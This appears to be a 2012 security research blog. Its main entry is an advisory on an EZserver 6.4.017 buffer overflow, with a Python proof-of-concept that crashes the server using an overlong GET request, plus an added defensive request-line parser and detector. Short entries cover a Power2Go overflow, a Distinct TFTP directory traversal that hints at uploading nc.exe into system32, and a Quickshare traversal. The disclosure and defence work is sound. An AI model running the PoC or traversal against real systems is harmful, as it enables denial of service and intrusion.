2012
06.18

EZserver version 6.4.017 and below contains a buffer overflow vulnerability that may be exploited to cause a denial of service or arbitrary code execution.

Software Description

EZserver is a video server that streams Full HD to various devices.

Developer Website

http://www.ezhometech.com/ezserver.htm


Vulnerability Details

A buffer overflow condition exists in URL handling: sending a long GET request to the server on port 8000
will cause the server process to exit and may allow malicious code injection.
Further research found that the application does not check the HTTP method at all,
so sending a long string of characters to port 8000 is enough to make the program crash.

Vendor logs

06/11/2012 – Bug found
06/12/2012 – Vendor contacted
06/16/2012 – No response, advisory released.

Proof of Concept

#!/usr/bin/python
# Python 2 proof of concept: a single over-long request line crashes the EZserver process.

from socket import *
import sys

if len(sys.argv) != 3:
    print "[*] Proof of Concept of Ezserver <=6.4.017 Buffer Overflow"
    print "[*] by Spentera Research - research[at]spentera[dot]com"
    print "[*] http://www.spentera.com/resources/security-advisory\n"
    print "[*] Usage: python %s ip port" % sys.argv[0]
    sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])

junk = "\x41" * 10000   # 10000 'A' bytes sent as the URL
payload = junk

print "[!] Connecting to %s on port %d" % (host, port)
s = socket(AF_INET, SOCK_STREAM)

try:
    s.connect((host, port))
    print "[+] Launching attack.."
    # The original omitted the space before HTTP/1.0; it is added here for a
    # well-formed request line, although the server crashes either way.
    s.send("GET /" + payload + " HTTP/1.0\r\n\r\n\r\n")
    s.close()
except:
    print "[x] Could not connect to the server x_x"
    sys.exit()
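As an added illustration, not part of the advisory and not EZserver's own code: a Python 3 request-line reader that enforces a length limit before it even looks at the method (the crash above happens regardless of method, so a method check alone would not help), plus a check that flags captured requests shaped like the PoC. MAX_REQUEST_LINE, the method allow-list and the two sample requests are assumptions; the advisory does not state the size of the overflowed buffer.

```python
import io
import re

# Assumed limit: the advisory does not give the overflowed buffer's size.
MAX_REQUEST_LINE = 4096
ALLOWED_METHODS = {"GET", "HEAD"}
# 512 or more repeats of one byte, the filler pattern the PoC sends.
LONG_RUN = re.compile(rb"(.)\1{511,}", re.DOTALL)

class RequestTooLong(Exception):
    pass

def read_request_line(stream, limit=MAX_REQUEST_LINE):
    """Read one request line while never holding more than limit+1 bytes.
    readline(limit + 1) stops even when no newline has been seen, so the
    length check runs before the method is looked at; the server crashes on
    any method, so a method check alone would not have prevented this bug."""
    line = stream.readline(limit + 1)
    if not line.endswith(b"\n"):
        if len(line) > limit:
            raise RequestTooLong("request line exceeds %d bytes" % limit)
        raise ValueError("truncated request line")
    parts = line.rstrip(b"\r\n").split(b" ")
    if len(parts) != 3:
        raise ValueError("malformed request line")
    method, target, version = (p.decode("ascii", "replace") for p in parts)
    if method not in ALLOWED_METHODS:
        raise ValueError("method not allowed: %s" % method)
    return method, target, version

def parse_request(raw, limit=MAX_REQUEST_LINE):
    """Parse the request line of a raw request held in memory (e.g. a capture)."""
    return read_request_line(io.BytesIO(raw), limit)

def flag_request(raw, limit=MAX_REQUEST_LINE):
    """Detection side: reasons a captured request matches the crash pattern."""
    first = raw.split(b"\n", 1)[0]
    reasons = []
    if len(first) > limit:
        reasons.append("request line is %d bytes (limit %d)" % (len(first), limit))
    if LONG_RUN.search(first):
        reasons.append("long run of a single repeated byte")
    return reasons

# Constructed samples: a normal request and one shaped like the advisory's PoC.
BENIGN = b"GET /index.html HTTP/1.0\r\n\r\n"
POC_LIKE = b"GET /" + b"A" * 10000 + b" HTTP/1.0\r\n\r\n"

if __name__ == "__main__":
    print(parse_request(BENIGN), flag_request(POC_LIKE))
```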

References

Exploit Database: http://www.exploit-db.com/exploits/19266/
Metasploit: http://www.metasploit.com/modules/exploit/windows/http/ezserver_http

2012
04.13

The proof of concept of the vulnerability was released on December 9, 2011, and there has been no further announcement from CyberLink. I tried to coordinate the issue until they didn't contact me anymore. A week after our last email, they updated the product, and yes, it's Power2Go 8. How do they know that the product is safe without letting me check again?

The application itself is still vulnerable to a stack buffer overflow, as we posted earlier here. This morning, a good friend from Metasploit, mr_me, sent me an email asking why I didn't get a shell from this POC. He also attached his working exploit script, which works flawlessly on Windows 7. Awesome!

Read More >>

2012
04.09

Overview

Distinct TFTP Server is part of Distinct Intranet Servers made by Distinct Corp. Distinct TFTP Server version 3.10 is susceptible to a directory traversal attack. An attacker can exploit this vulnerability to retrieve or upload files outside of the TFTP server root directory.

Software Description

From Distinct website:

Distinct Intranet Servers, which include FTP Server, TFTP, LPD, BOOTP and NFS, bring quality server power to your network with no additional hardware investment. These servers allow you to make use of your PCs to share important services among your users.

Vulnerability Details and Attack Vector

The vulnerability is caused by improper validation of GET and PUT requests containing dot dot slash ('../') sequences, which allows attackers to read or write arbitrary files.

By including a dot dot slash sequence in a GET or PUT request, it is possible to retrieve operating system files such as boot.ini or to upload a file (errh, nc.exe?) to the Windows %systemroot% (C:\WINDOWS\system32\).

Read More >>

2012
03.19

This is my experience when I was dealing with some applications that have a directory traversal vulnerability. I was using DotDotPwn by nitr0us when I found the vulnerability in Quickshare File Server 1.2.1 (on the FTP protocol). I also used DotDotPwn when I was doing a pentest for my client. So, let the experience tell you the story.

Quickshare File Server 1.2.1

First, I downloaded the software here, set up the XP lab machine, and downloaded DotDotPwn here; with that, all preparation should be ready. We must set up Quickshare File Server to point to our FTP directory and set the user to "Allow anonymous user".

Read More >>